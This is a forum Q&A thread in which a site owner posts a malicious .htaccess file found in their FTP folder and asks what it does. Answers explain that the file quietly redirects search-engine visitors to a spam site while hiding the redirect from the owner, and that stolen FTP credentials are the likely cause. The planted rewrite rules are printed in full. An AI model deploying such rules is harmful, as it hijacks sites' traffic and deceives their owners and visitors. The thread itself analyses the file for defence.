20

This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
ovinophile
  • 303
  • 1
  • 4
  • 1
    NICE! (In an evil sort of way...) Is basically taking everyone who's coming to your site from a search engine and redirecting them to SPAMMER.info – KPWINC Nov 03 '09 at 23:17
  • Had this happen to me once. The `.htaccess` file added to my site had about 40 blank lines at the top, just to confuse me further. – TRiG Nov 08 '10 at 11:44

3 Answers3

15

That sends users that come from a search engine to the last site SPAMMER.info (see question history for actual site).

It looks for referrers in an attempt to hide from you, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.

Note: this does not affect web crawlers as they (googlebot, at least) don't set the referrer header.

Michael Haren
  • 1,301
  • 6
  • 17
  • 31
8

Any time a user from a search engine any page on your site, they'll be redirected to .info spam site.

It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.

Greg
  • 375
  • 1
  • 3
  • 12
  • 1
    Since it's looking at the referrer, won't it redirect any clicks that come through a search engine? –  Nov 02 '09 at 15:51
  • Doesn't it affect links from Google as well? E.g., you search for the OP's site on Google, click on it and you're redirected since you come from Google? –  Nov 02 '09 at 15:53
  • Yes, Links from search engines only (as I said in my answer) but *not* search engine crawlers/bots. This answer has been updated so it is now correct. It originally indicated that this applied to bots only. – Michael Haren Nov 02 '09 at 15:55
1

to add more - most probably your ftp credentials got leaked. maybe you had them saved in filezilla / total commander etc. there is plenty of malware stealing those and then 'going' around - logging on to ftp accounts, attaching malicious javascript to index.php / html or putting similar rewrite files.

pQd
  • 29,561
  • 5
  • 64
  • 106
  • I am facing this issue. Day after other .htaccess file get modified which result in internal server error. – vnix27 May 12 '11 at 14:06